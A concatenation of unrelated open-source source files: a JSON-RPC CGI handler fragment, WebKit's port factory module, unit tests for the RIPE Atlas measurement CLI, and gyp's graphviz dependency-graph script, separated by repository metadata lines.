jsonrpc = fields.getfirst("jsonrpc")
id = fields.getfirst("id")
method = fields.getfirst("method")
params = fields.getfirst("params")
if params:
params = json.loads(params)
if isinstance(params, list):
args = params
kwargs = {}
elif isinstance(params, dict):
args = []
kwargs = params
# Create JSON reqeust string
request_dict = rpcrequest.create_request_dict(method, *args, **kwargs)
request_dict["jsonrpc"] = jsonrpc
request_dict["id"] = id
request_json = json.dumps(request_dict)
# Call
response_json = rpclib.JsonRpc(methods = methods).call(request_json)
# Return headers
print "Content-Type: application/json"
print "Cache-Control: no-cache"
print "Pragma: no-cache"
print
# Return result
print response_json
|
mit
|
angelman/phantomjs
|
src/qt/qtwebkit/Tools/Scripts/webkitpy/port/factory.py
|
118
|
5888
|
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Factory method to retrieve the appropriate port implementation."""
import fnmatch
import optparse
import re
from webkitpy.port import builders
def platform_options(use_globs=False):
return [
optparse.make_option('--platform', action='store',
help=('Glob-style list of platform/ports to use (e.g., "mac*")' if use_globs else 'Platform to use (e.g., "mac-lion")')),
optparse.make_option('--efl', action='store_const', dest='platform',
const=('efl*' if use_globs else 'efl'),
help=('Alias for --platform=efl*' if use_globs else 'Alias for --platform=efl')),
optparse.make_option('--gtk', action='store_const', dest='platform',
const=('gtk*' if use_globs else 'gtk'),
help=('Alias for --platform=gtk*' if use_globs else 'Alias for --platform=gtk')),
optparse.make_option('--qt', action='store_const', dest="platform",
const=('qt*' if use_globs else 'qt'),
help=('Alias for --platform=qt' if use_globs else 'Alias for --platform=qt')),
]
def configuration_options():
return [
optparse.make_option("-t", "--target", dest="configuration", help="(DEPRECATED)"),
# FIXME: --help should display which configuration is default.
optparse.make_option('--debug', action='store_const', const='Debug', dest="configuration",
help='Set the configuration to Debug'),
optparse.make_option('--release', action='store_const', const='Release', dest="configuration",
help='Set the configuration to Release'),
optparse.make_option('--32-bit', action='store_const', const='x86', default=None, dest="architecture",
help='use 32-bit binaries by default (x86 instead of x86_64)'),
]
def _builder_options(builder_name):
configuration = "Debug" if re.search(r"[d|D](ebu|b)g", builder_name) else "Release"
is_webkit2 = builder_name.find("WK2") != -1
builder_name = builder_name
return optparse.Values({'builder_name': builder_name, 'configuration': configuration, 'webkit_test_runner': is_webkit2})
class PortFactory(object):
PORT_CLASSES = (
'efl.EflPort',
'gtk.GtkPort',
'mac.MacPort',
'mock_drt.MockDRTPort',
'qt.QtPort',
'test.TestPort',
'win.WinPort',
)
def __init__(self, host):
self._host = host
def _default_port(self, options):
platform = self._host.platform
if platform.is_linux() or platform.is_freebsd():
return 'qt-linux'
elif platform.is_mac():
return 'mac'
elif platform.is_win():
return 'win'
raise NotImplementedError('unknown platform: %s' % platform)
def get(self, port_name=None, options=None, **kwargs):
"""Returns an object implementing the Port interface. If
port_name is None, this routine attempts to guess at the most
appropriate port on this platform."""
port_name = port_name or self._default_port(options)
for port_class in self.PORT_CLASSES:
module_name, class_name = port_class.rsplit('.', 1)
module = __import__(module_name, globals(), locals(), [], -1)
cls = module.__dict__[class_name]
if port_name.startswith(cls.port_name):
port_name = cls.determine_full_port_name(self._host, options, port_name)
return cls(self._host, port_name, options=options, **kwargs)
raise NotImplementedError('unsupported platform: "%s"' % port_name)
def all_port_names(self, platform=None):
"""Return a list of all valid, fully-specified, "real" port names.
This is the list of directories that are used as actual baseline_paths()
by real ports. This does not include any "fake" names like "test"
or "mock-mac", and it does not include any directories that are not.
If platform is not specified, we will glob-match all ports"""
platform = platform or '*'
return fnmatch.filter(builders.all_port_names(), platform)
def get_from_builder_name(self, builder_name):
port_name = builders.port_name_for_builder_name(builder_name)
assert port_name, "unrecognized builder name '%s'" % builder_name
return self.get(port_name, _builder_options(builder_name))
|
bsd-3-clause
|
pierky/ripe-atlas-tools
|
tests/commands/measure.py
|
1
|
34634
|
# -*- coding: UTF-8 -*-
# Copyright (c) 2015 RIPE NCC
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import copy
import unittest
from random import randint
# Python 3.4+ comes with mock in unittest
try:
from unittest import mock
except ImportError:
import mock
from ripe.atlas.tools.commands.measure.base import Command
from ripe.atlas.tools.commands.measure import (
PingMeasureCommand,
TracerouteMeasureCommand,
DnsMeasureCommand,
SslcertMeasureCommand,
HttpMeasureCommand,
NtpMeasureCommand,
)
from ripe.atlas.tools.exceptions import RipeAtlasToolsException
from ripe.atlas.tools.settings import Configuration
from ..base import capture_sys_output
class TestMeasureCommand(unittest.TestCase):
CONF = "ripe.atlas.tools.commands.measure.base.conf"
KINDS = {
"ping": PingMeasureCommand,
"traceroute": TracerouteMeasureCommand,
"dns": DnsMeasureCommand,
"sslcert": SslcertMeasureCommand,
"http": HttpMeasureCommand,
"ntp": NtpMeasureCommand,
}
def setUp(self):
self.maxDiff = None
def test_no_arguments(self):
with capture_sys_output():
with self.assertRaises(RipeAtlasToolsException) as e:
Command().init_args([])
self.assertTrue(
str(e.exception).startswith("Usage: ripe-atlas measure <"))
def test_bad_type_argument(self):
with capture_sys_output():
with self.assertRaises(RipeAtlasToolsException) as e:
Command().init_args(["not-a-type"])
self.assertTrue(
str(e.exception).startswith("Usage: ripe-atlas measure <"))
@mock.patch(CONF, Configuration.DEFAULT)
def test_dry_run(self):
with capture_sys_output() as (stdout, stderr):
cmd = PingMeasureCommand()
cmd.init_args(["ping", "--target", "ripe.net", "--dry-run"])
cmd.run()
expected = (
"\n"
"Definitions:\n"
"================================================================================\n"
"target ripe.net\n"
"packet_interval 1000\n"
"description Ping measurement to ripe.net\n"
"af 4\n"
"packets 3\n"
"size 48\n"
"\n"
"Sources:\n"
"================================================================================\n"
"requested 50\n"
"type area\n"
"value WW\n"
"tags\n"
" include system-ipv4-works\n"
" exclude \n"
"\n"
)
self.assertEqual(
set(stdout.getvalue().split("\n")),
set(expected.split("\n"))
)
with capture_sys_output() as (stdout, stderr):
cmd = PingMeasureCommand()
cmd.init_args([
"ping",
"--target", "ripe.net",
"--af", "6",
"--include-tag", "alpha",
"--include-tag", "bravo",
"--include-tag", "charlie",
"--exclude-tag", "delta",
"--exclude-tag", "echo",
"--exclude-tag", "foxtrot",
"--dry-run"
])
cmd.run()
expected = (
"\n"
"Definitions:\n"
"================================================================================\n"
"target ripe.net\n"
"packet_interval 1000\n"
"description Ping measurement to ripe.net\n"
"af 6\n"
"packets 3\n"
"size 48\n"
"\n"
"Sources:\n"
"================================================================================\n"
"requested 50\n"
"type area\n"
"value WW\n"
"tags\n"
" include alpha, bravo, charlie\n"
" exclude delta, echo, foxtrot\n"
"\n"
)
self.assertEqual(
set(stdout.getvalue().split("\n")),
set(expected.split("\n"))
)
def test_clean_target(self):
cmd = PingMeasureCommand()
with capture_sys_output():
cmd.init_args(["ping", "--target", "ripe.net"])
self.assertEqual(cmd.clean_target(), "ripe.net")
cmd = DnsMeasureCommand()
with capture_sys_output():
cmd.init_args(["dns", "--query-argument", "ripe.net"])
self.assertEqual(cmd.clean_target(), None)
@mock.patch(CONF, Configuration.DEFAULT)
def test_get_measurement_kwargs_ping(self):
spec = Configuration.DEFAULT["specification"]["types"]["ping"]
cmd = PingMeasureCommand()
cmd.init_args([
"ping", "--target", "ripe.net"
])
self.assertEqual(
cmd._get_measurement_kwargs(),
{
"af": Configuration.DEFAULT["specification"]["af"],
"description": "Ping measurement to ripe.net",
"target": "ripe.net",
"packets": spec["packets"],
"packet_interval": spec["packet-interval"],
"size": spec["size"]
}
)
cmd = PingMeasureCommand()
cmd.init_args([
"ping",
"--target", "ripe.net",
"--af", "6",
"--description", "This is my description",
"--packets", "7",
"--packet-interval", "200",
"--size", "24"
])
self.assertEqual(
cmd._get_measurement_kwargs(),
{
"af": 6,
"description": "This is my description",
"target": "ripe.net",
"packets": 7,
"packet_interval": 200,
"size": 24
}
)
@mock.patch(CONF, Configuration.DEFAULT)
def test_get_measurement_kwargs_traceroute(self):
spec = Configuration.DEFAULT["specification"]["types"]["traceroute"]
cmd = TracerouteMeasureCommand()
cmd.init_args([
"traceroute", "--target", "ripe.net"
])
self.assertEqual(
cmd._get_measurement_kwargs(),
{
"af": Configuration.DEFAULT["specification"]["af"],
"description": "Traceroute measurement to ripe.net",
"target": "ripe.net",
"packets": spec["packets"],
"size": spec["size"],
"destination_option_size": spec["destination-option-size"],
"hop_by_hop_option_size": spec["hop-by-hop-option-size"],
"dont_fragment": spec["dont-fragment"],
"first_hop": spec["first-hop"],
"max_hops": spec["max-hops"],
"paris": spec["paris"],
"port": spec["port"],
"protocol": spec["protocol"],
"timeout": spec["timeout"]
}
)
cmd = TracerouteMeasureCommand()
cmd.init_args([
"traceroute",
"--af", "6",
"--description", "This is my description",
"--target", "ripe.net",
"--packets", "7",
"--size", "24",
"--destination-option-size", "12",
"--hop-by-hop-option-size", "13",
"--dont-fragment",
"--first-hop", "2",
"--max-hops", "5",
"--paris", "8",
"--port", "123",
"--protocol", "TCP",
"--timeout", "1500"
])
self.assertEqual(
cmd._get_measurement_kwargs(),
{
"af": 6,
"description": "This is my description",
"target": "ripe.net",
"packets": 7,
"size": 24,
"destination_option_size": 12,
"hop_by_hop_option_size": 13,
"dont_fragment": True,
"first_hop": 2,
"max_hops": 5,
"paris": 8,
"port": 123,
"protocol": "TCP",
"timeout": 1500
}
)
"""Tests for the protocol provided in lower case"""
cmd = TracerouteMeasureCommand()
cmd.init_args([
"traceroute", "--target", "ripe.net", "--protocol", "icmp"
])
self.assertEqual(
cmd._get_measurement_kwargs(),
{
"af": Configuration.DEFAULT["specification"]["af"],
"description": "Traceroute measurement to ripe.net",
"target": "ripe.net",
"packets": spec["packets"],
"size": spec["size"],
"destination_option_size": spec["destination-option-size"],
"hop_by_hop_option_size": spec["hop-by-hop-option-size"],
"dont_fragment": spec["dont-fragment"],
"first_hop": spec["first-hop"],
"max_hops": spec["max-hops"],
"paris": spec["paris"],
"port": spec["port"],
"protocol": "ICMP",
"timeout": spec["timeout"]
}
)
@mock.patch(CONF, Configuration.DEFAULT)
def test_get_measurement_kwargs_dns(self):
spec = Configuration.DEFAULT["specification"]["types"]["dns"]
cmd = DnsMeasureCommand()
cmd.init_args([
"dns", "--query-argument", "ripe.net"
])
self.assertEqual(
cmd._get_measurement_kwargs(),
{
"af": Configuration.DEFAULT["specification"]["af"],
"description": "DNS measurement for ripe.net",
"query_class": spec["query-class"],
"query_type": spec["query-type"],
"query_argument": "ripe.net",
"set_cd_bit": spec["set-cd-bit"],
"set_do_bit": spec["set-do-bit"],
"set_rd_bit": spec["set-rd-bit"],
"set_nsid_bit": spec["set-nsid-bit"],
"protocol": spec["protocol"],
"retry": spec["retry"],
"udp_payload_size": spec["udp-payload-size"],
"use_probe_resolver": True,
}
)
cmd = DnsMeasureCommand()
cmd.init_args([
"dns",
"--af", "6",
"--description", "This is my description",
"--target", "non-existent-dns.ripe.net",
"--query-class", "CHAOS",
"--query-type", "SOA",
"--query-argument", "some arbitrary string",
"--set-cd-bit",
"--set-do-bit",
"--set-rd-bit",
"--set-nsid-bit",
"--protocol", "TCP",
"--retry", "2",
"--udp-payload-size", "5"
])
self.assertEqual(
cmd._get_measurement_kwargs(),
{
"af": 6,
"description": "This is my description",
"target": "non-existent-dns.ripe.net",
"query_class": "CHAOS",
"query_type": "SOA",
"query_argument": "some arbitrary string",
"set_cd_bit": True,
"set_do_bit": True,
"set_rd_bit": True,
"set_nsid_bit": True,
"protocol": "TCP",
"retry": 2,
"udp_payload_size": 5,
"use_probe_resolver": False
}
)
"""Testing for protocol argument in lower case"""
cmd = DnsMeasureCommand()
cmd.init_args([
"dns", "--query-argument", "ripe.net", "--protocol", "tcp"
])
self.assertEqual(
cmd._get_measurement_kwargs(),
{
"af": Configuration.DEFAULT["specification"]["af"],
"description": "DNS measurement for ripe.net",
"query_class": spec["query-class"],
"query_type": spec["query-type"],
"query_argument": "ripe.net",
"set_cd_bit": spec["set-cd-bit"],
"set_do_bit": spec["set-do-bit"],
"set_rd_bit": spec["set-rd-bit"],
"set_nsid_bit": spec["set-nsid-bit"],
"protocol": "TCP",
"retry": spec["retry"],
"udp_payload_size": spec["udp-payload-size"],
"use_probe_resolver": True,
}
)
"""Testing for query class in lower case"""
cmd = DnsMeasureCommand()
cmd.init_args([
"dns", "--query-argument", "ripe.net", "--query-class", "in"
])
self.assertEqual(
cmd._get_measurement_kwargs(),
{
"af": Configuration.DEFAULT["specification"]["af"],
"description": "DNS measurement for ripe.net",
"query_class": "IN",
"query_type": spec["query-type"],
"query_argument": "ripe.net",
"set_cd_bit": spec["set-cd-bit"],
"set_do_bit": spec["set-do-bit"],
"set_rd_bit": spec["set-rd-bit"],
"set_nsid_bit": spec["set-nsid-bit"],
"protocol": spec["protocol"],
"retry": spec["retry"],
"udp_payload_size": spec["udp-payload-size"],
"use_probe_resolver": True,
}
)
"""Testing for query type in lower case"""
cmd = DnsMeasureCommand()
cmd.init_args([
"dns", "--query-argument", "ripe.net", "--query-type", "txt"
])
self.assertEqual(
cmd._get_measurement_kwargs(),
{
"af": Configuration.DEFAULT["specification"]["af"],
"description": "DNS measurement for ripe.net",
"query_class": spec["query-class"],
"query_type": "TXT",
"query_argument": "ripe.net",
"set_cd_bit": spec["set-cd-bit"],
"set_do_bit": spec["set-do-bit"],
"set_rd_bit": spec["set-rd-bit"],
"set_nsid_bit": spec["set-nsid-bit"],
"protocol": spec["protocol"],
"retry": spec["retry"],
"udp_payload_size": spec["udp-payload-size"],
"use_probe_resolver": True,
}
)
@mock.patch(CONF, Configuration.DEFAULT)
def test_get_measurement_kwargs_sslcert(self):
spec = Configuration.DEFAULT["specification"]["types"]["sslcert"]
cmd = SslcertMeasureCommand()
cmd.init_args([
"sslcert", "--target", "ripe.net"
])
self.assertEqual(
cmd._get_measurement_kwargs(),
{
"af": Configuration.DEFAULT["specification"]["af"],
"description": "Sslcert measurement to ripe.net",
"target": "ripe.net",
"port": spec["port"]
}
)
cmd = SslcertMeasureCommand()
cmd.init_args([
"sslcert",
"--target", "ripe.net",
"--af", "6",
"--description", "This is my description",
"--port", "7"
])
self.assertEqual(
cmd._get_measurement_kwargs(),
{
"af": 6,
"description": "This is my description",
"target": "ripe.net",
"port": 7
}
)
@mock.patch(CONF, Configuration.DEFAULT)
def test_get_measurement_kwargs_http(self):
spec = Configuration.DEFAULT["specification"]["types"]["http"]
cmd = HttpMeasureCommand()
cmd.init_args([
"http", "--target", "ripe.net"
])
self.assertEqual(
cmd._get_measurement_kwargs(),
{
"af": Configuration.DEFAULT["specification"]["af"],
"description": "Http measurement to ripe.net",
"target": "ripe.net",
"header_bytes": spec["header-bytes"],
"version": spec["version"],
"method": spec["method"],
"port": spec["port"],
"path": spec["path"],
"query_string": spec["query-string"],
"user_agent": spec["user-agent"],
"max_bytes_read": spec["body-bytes"],
}
)
cmd = HttpMeasureCommand()
cmd.init_args([
"http",
"--target", "ripe.net",
"--af", "6",
"--description", "This is my description",
"--header-bytes", "100",
"--version", "99",
"--method", "a-method",
"--port", "7",
"--path", "/path/to/something",
"--query-string", "x=7",
"--user-agent", "This is my custom user agent",
"--body-bytes", "200",
"--timing-verbosity", "2"
])
self.assertEqual(
cmd._get_measurement_kwargs(),
{
"af": 6,
"description": "This is my description",
"target": "ripe.net",
"header_bytes": 100,
"version": "99",
"method": "a-method",
"port": 7,
"path": "/path/to/something",
"query_string": "x=7",
"user_agent": "This is my custom user agent",
"max_bytes_read": 200,
"extended_timing": True,
"more_extended_timing": True
}
)
@mock.patch(CONF, Configuration.DEFAULT)
def test_get_measurement_kwargs_ntp(self):
spec = Configuration.DEFAULT["specification"]["types"]["ntp"]
cmd = NtpMeasureCommand()
cmd.init_args([
"ntp", "--target", "ripe.net"
])
self.assertEqual(
cmd._get_measurement_kwargs(),
{
"af": Configuration.DEFAULT["specification"]["af"],
"description": "Ntp measurement to ripe.net",
"target": "ripe.net",
"packets": spec["packets"],
"timeout": spec["timeout"]
}
)
cmd = NtpMeasureCommand()
cmd.init_args([
"ntp",
"--target", "ripe.net",
"--af", "6",
"--description", "This is my description",
"--packets", "6",
"--timeout", "9000"
])
self.assertEqual(
cmd._get_measurement_kwargs(),
{
"af": 6,
"description": "This is my description",
"target": "ripe.net",
"packets": 6,
"timeout": 9000
}
)
@mock.patch(CONF, Configuration.DEFAULT)
def test_get_source_kwargs(self):
spec = Configuration.DEFAULT["specification"]
for kind, klass in self.KINDS.items():
cmd = klass()
args = [kind, "--target", "example.com"]
if kind == "dns":
args = ["dns", "--query-argument", "example.com"]
cmd.init_args(list(args))
tags = spec["tags"]["ipv{}".format(cmd._get_af())]
includes = tags[kind]["include"] + tags["all"]["include"]
excludes = tags[kind]["exclude"] + tags["all"]["exclude"]
self.assertEqual(cmd._get_source_kwargs(), {
"requested": spec["source"]["requested"],
"type": spec["source"]["type"],
"value": spec["source"]["value"],
"tags": {"include": includes, "exclude": excludes}
})
cmd = klass()
cmd.init_args(args + [
"--probes", "10",
"--from-country", "ca"
])
self.assertEqual(cmd._get_source_kwargs(), {
"requested": 10,
"type": "country",
"value": "CA",
"tags": {"include": includes, "exclude": excludes}
})
for area in ("WW", "West", "North-Central", "South-Central",
"North-East", "South-East"):
cmd = klass()
cmd.init_args(args + [
"--probes", "10",
"--from-area", area
])
self.assertEqual(cmd._get_source_kwargs(), {
"requested": 10,
"type": "area",
"value": area,
"tags": {"include": includes, "exclude": excludes}
})
cmd = klass()
cmd.init_args(args + [
"--probes", "10",
"--from-prefix", "1.2.3.0/22"
])
self.assertEqual(cmd._get_source_kwargs(), {
"requested": 10,
"type": "prefix",
"value": "1.2.3.0/22",
"tags": {"include": includes, "exclude": excludes}
})
cmd = klass()
cmd.init_args(args + [
"--probes", "10",
"--from-asn", "3333"
])
self.assertEqual(cmd._get_source_kwargs(), {
"requested": 10,
"type": "asn",
"value": 3333,
"tags": {"include": includes, "exclude": excludes}
})
# Try 20 permutations of probe lists
for __ in range(0, 20):
requested = randint(1, 500)
selection = [str(randint(1, 5000)) for _ in range(0, 100)]
cmd = klass()
cmd.init_args(args + [
"--probes", str(requested),
"--from-probes", ",".join(selection)
])
self.assertEqual(cmd._get_source_kwargs(), {
"requested": requested,
"type": "probes",
"value": ",".join(selection),
"tags": {"include": includes, "exclude": excludes}
})
cmd = klass()
cmd.init_args(args + [
"--probes", "10",
"--from-measurement", "1001"
])
self.assertEqual(cmd._get_source_kwargs(), {
"requested": 10,
"type": "msm",
"value": 1001,
"tags": {"include": includes, "exclude": excludes}
})
cmd = klass()
cmd.init_args(args + [
"--include-tag", "tag-to-include",
"--exclude-tag", "tag-to-exclude"
])
self.assertEqual(cmd._get_source_kwargs(), {
"requested": spec["source"]["requested"],
"type": spec["source"]["type"],
"value": spec["source"]["value"],
"tags": {
"include": ["tag-to-include"],
"exclude": ["tag-to-exclude"]
}
})
def test_get_af(self):
conf = copy.deepcopy(Configuration.DEFAULT)
conf["specification"]["af"] = 100
for kind, klass in self.KINDS.items():
with mock.patch(self.CONF, conf):
for af in (4, 6):
cmd = klass()
cmd.init_args([kind, "--af", str(af)])
self.assertEqual(cmd._get_af(), af)
cmd = klass()
cmd.init_args([kind, "--target", "1.2.3.4"])
self.assertEqual(cmd._get_af(), 4)
cmd = klass()
cmd.init_args([kind, "--target", "1:2:3:4:5:6:7:8"])
self.assertEqual(cmd._get_af(), 6)
cmd = klass()
cmd.init_args([kind, "--target", "1.2.3.4.5"])
self.assertEqual(
cmd._get_af(),
conf["specification"]["af"]
)
def test_handle_api_error(self):
cmd = Command()
message = (
"There was a problem communicating with the RIPE Atlas "
"infrastructure. The message given was:\n\n {}"
)
with self.assertRaises(RipeAtlasToolsException) as e:
cmd._handle_api_error("This is a plain text error")
self.assertEqual(
str(e.exception),
message.format("This is a plain text error")
)
with self.assertRaises(RipeAtlasToolsException) as e:
cmd._handle_api_error({"detail": "This is a formatted error"})
self.assertEqual(
str(e.exception),
message.format("This is a formatted error")
)
def test_add_arguments(self):
with capture_sys_output() as (stdout, stderr):
with self.assertRaises(SystemExit):
PingMeasureCommand().init_args([
"ping",
"--renderer", "not-a-renderer"
])
self.assertTrue(stderr.getvalue().split("\n")[-2].startswith(
"ripe-atlas measure: error: argument --renderer: invalid "
"choice: 'not-a-renderer' (choose from"
))
with capture_sys_output() as (stdout, stderr):
with self.assertRaises(SystemExit):
PingMeasureCommand().init_args(["ping", "--af", "5"])
self.assertEqual(
stderr.getvalue().split("\n")[-2],
"ripe-atlas measure: error: argument --af: invalid choice: 5 "
"(choose from 4, 6)"
)
with capture_sys_output() as (stdout, stderr):
with self.assertRaises(SystemExit):
PingMeasureCommand().init_args([
"ping",
"--target", "not a target"
])
self.assertEqual(
stderr.getvalue().split("\n")[-2],
"ripe-atlas measure: error: argument --target: "
"\"not a target\" does not appear to be an IP address or host "
"name"
)
with capture_sys_output() as (stdout, stderr):
with self.assertRaises(SystemExit):
PingMeasureCommand().init_args(["ping", "--from-area", "not an area"])
self.assertTrue(stderr.getvalue().split("\n")[-2].startswith(
"ripe-atlas measure: error: argument --from-area: invalid "
"choice:"))
with capture_sys_output() as (stdout, stderr):
with self.assertRaises(SystemExit):
PingMeasureCommand().init_args(["ping", "--from-probes", "0,50000"])
self.assertEqual(
stderr.getvalue().split("\n")[-2],
"ripe-atlas measure: error: argument --from-probes: 0 "
"is lower than the minimum permitted value of 1."
)
for clude in ("in", "ex"):
with capture_sys_output() as (stdout, stderr):
for tag in ("NotATag", "tag!", "not a tag", "νοτ α ταγ"):
with self.assertRaises(SystemExit):
PingMeasureCommand().init_args([
"ping",
"--{}clude-tag".format(clude), tag
])
self.assertEqual(
stderr.getvalue().split("\n")[-2],
'ripe-atlas measure: error: argument --{}clude-tag: '
'"{}" does not appear to be a valid tag.'.format(clude, tag)
)
with capture_sys_output() as (stdout, stderr):
with self.assertRaises(SystemExit):
TracerouteMeasureCommand().init_args(["traceroute", "--protocol", "invalid"])
self.assertEqual(
stderr.getvalue().split("\n")[-2],
"ripe-atlas measure: error: argument --protocol: invalid "
"choice: 'INVALID' (choose from 'ICMP', 'UDP', 'TCP')"
)
with capture_sys_output() as (stdout, stderr):
with self.assertRaises(SystemExit):
DnsMeasureCommand().init_args(["dns", "--protocol", "invalid"])
self.assertEqual(
stderr.getvalue().split("\n")[-2],
"ripe-atlas measure: error: argument --protocol: invalid "
"choice: 'INVALID' (choose from 'UDP', 'TCP')"
)
with capture_sys_output() as (stdout, stderr):
with self.assertRaises(SystemExit):
HttpMeasureCommand().init_args(
["http", "--timing-verbosity", "3"])
self.assertEqual(
stderr.getvalue().split("\n")[-2],
"ripe-atlas measure: error: argument --timing-verbosity: "
"invalid choice: 3 (choose from 0, 1, 2)"
)
min_options = {
"from-measurement": ((PingMeasureCommand,), 1),
"probes": ((PingMeasureCommand,), 1),
"packets": (
(
PingMeasureCommand,
TracerouteMeasureCommand,
NtpMeasureCommand
),
1
),
"size": ((PingMeasureCommand, TracerouteMeasureCommand), 1),
"packet-interval": ((PingMeasureCommand,), 1),
"timeout": ((TracerouteMeasureCommand, NtpMeasureCommand,), 1),
"destination-option-size": ((TracerouteMeasureCommand,), 1),
"hop-by-hop-option-size": ((TracerouteMeasureCommand,), 1),
"retry": ((DnsMeasureCommand,), 1),
"udp-payload-size": ((DnsMeasureCommand,), 1),
}
for option, (klasses, minimum) in min_options.items():
for klass in klasses:
with capture_sys_output() as (stdout, stderr):
test_value = minimum - 1
with self.assertRaises(SystemExit):
klass().init_args([
klass.__name__.replace("MeasureCommand", "").lower(),
"--{}".format(option), str(test_value)
])
self.assertEqual(
stderr.getvalue().split("\n")[-2],
"ripe-atlas measure: error: argument --{}: "
"The integer must be greater than {}.".format(
option,
minimum
)
)
min_max_options = {
"from-asn": (
(PingMeasureCommand,),
(0, 2 ** 32 - 2 + 1)
),
"paris": (
(TracerouteMeasureCommand,),
(-1, 65)
),
"first-hop": (
(TracerouteMeasureCommand,),
(0, 256)
),
"max-hops": (
(TracerouteMeasureCommand,),
(0, 256)
),
"port": (
(
TracerouteMeasureCommand,
SslcertMeasureCommand,
HttpMeasureCommand
),
(0, 2 ** 16 + 1)
),
"header-bytes": ((HttpMeasureCommand,), (-1, 2049)),
"body-bytes": ((HttpMeasureCommand,), (0, 1020049)),
}
for option, (klasses, extremes) in min_max_options.items():
for klass in klasses:
for val in extremes:
with capture_sys_output() as (stdout, stderr):
with self.assertRaises(SystemExit):
klass().init_args([
klass.__name__.replace("MeasureCommand", "").lower(),
"--{}".format(option), str(val)
])
self.assertEqual(
stderr.getvalue().split("\n")[-2],
"ripe-atlas measure: error: argument --{}: The "
"integer must be between {} and {}.".format(
option, extremes[0] + 1, extremes[1] - 1
)
)
@mock.patch(CONF, Configuration.DEFAULT)
def test_account_for_selected_probes(self):
spec = Configuration.DEFAULT["specification"]
cmd = PingMeasureCommand()
cmd.init_args(["ping", "--target", "ripe.net"])
cmd._account_for_selected_probes(),
self.assertEqual(cmd.arguments.probes, spec["source"]["requested"])
cmd = PingMeasureCommand()
cmd.init_args(["ping", "--target", "ripe.net", "--probes", "7"])
cmd._account_for_selected_probes(),
self.assertEqual(cmd.arguments.probes, 7)
cmd = PingMeasureCommand()
cmd.init_args(["ping", "--target", "ripe.net", "--from-probes", "1,2"])
cmd._account_for_selected_probes(),
self.assertEqual(cmd.arguments.probes, 2)
cmd = PingMeasureCommand()
cmd.init_args([
"ping",
"--target", "ripe.net",
"--from-probes", "1,2",
"--probes", "7"
])
with capture_sys_output() as (stdout, stderr):
with self.assertRaises(RipeAtlasToolsException):
cmd._account_for_selected_probes(),
|
gpl-3.0
|
Prash88/my-wedding
|
node_modules/node-gyp/gyp/tools/graphviz.py
|
2679
|
2878
|
#!/usr/bin/env python
# Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Using the JSON dumped by the dump-dependency-json generator,
generate input suitable for graphviz to render a dependency graph of
targets."""
import collections
import json
import sys
def ParseTarget(target):
target, _, suffix = target.partition('#')
filename, _, target = target.partition(':')
return filename, target, suffix
def LoadEdges(filename, targets):
"""Load the edges map from the dump file, and filter it to only
show targets in |targets| and their depedendents."""
file = open('dump.json')
edges = json.load(file)
file.close()
# Copy out only the edges we're interested in from the full edge list.
target_edges = {}
to_visit = targets[:]
while to_visit:
src = to_visit.pop()
if src in target_edges:
continue
target_edges[src] = edges[src]
to_visit.extend(edges[src])
return target_edges
def WriteGraph(edges):
"""Print a graphviz graph to stdout.
|edges| is a map of target to a list of other targets it depends on."""
# Bucket targets by file.
files = collections.defaultdict(list)
for src, dst in edges.items():
build_file, target_name, toolset = ParseTarget(src)
files[build_file].append(src)
print 'digraph D {'
print ' fontsize=8' # Used by subgraphs.
print ' node [fontsize=8]'
# Output nodes by file. We must first write out each node within
# its file grouping before writing out any edges that may refer
# to those nodes.
for filename, targets in files.items():
if len(targets) == 1:
# If there's only one node for this file, simplify
# the display by making it a box without an internal node.
target = targets[0]
build_file, target_name, toolset = ParseTarget(target)
print ' "%s" [shape=box, label="%s\\n%s"]' % (target, filename,
target_name)
else:
# Group multiple nodes together in a subgraph.
print ' subgraph "cluster_%s" {' % filename
print ' label = "%s"' % filename
for target in targets:
build_file, target_name, toolset = ParseTarget(target)
print ' "%s" [label="%s"]' % (target, target_name)
print ' }'
# Now that we've placed all the nodes within subgraphs, output all
# the edges between nodes.
for src, dsts in edges.items():
for dst in dsts:
print ' "%s" -> "%s"' % (src, dst)
print '}'
def main():
if len(sys.argv) < 2:
print >>sys.stderr, __doc__
print >>sys.stderr
print >>sys.stderr, 'usage: %s target1 target2...' % (sys.argv[0])
return 1
edges = LoadEdges('dump.json', sys.argv[1:])
WriteGraph(edges)
return 0
if __name__ == '__main__':
sys.exit(main())
|
mit
|
Liuqian0501/elements-of-programming-interview
|
09-binary-tree/9-1-Test if a binary tree is height-balanced/python/balanced_binary_tree.py
|
2
|
1774
|
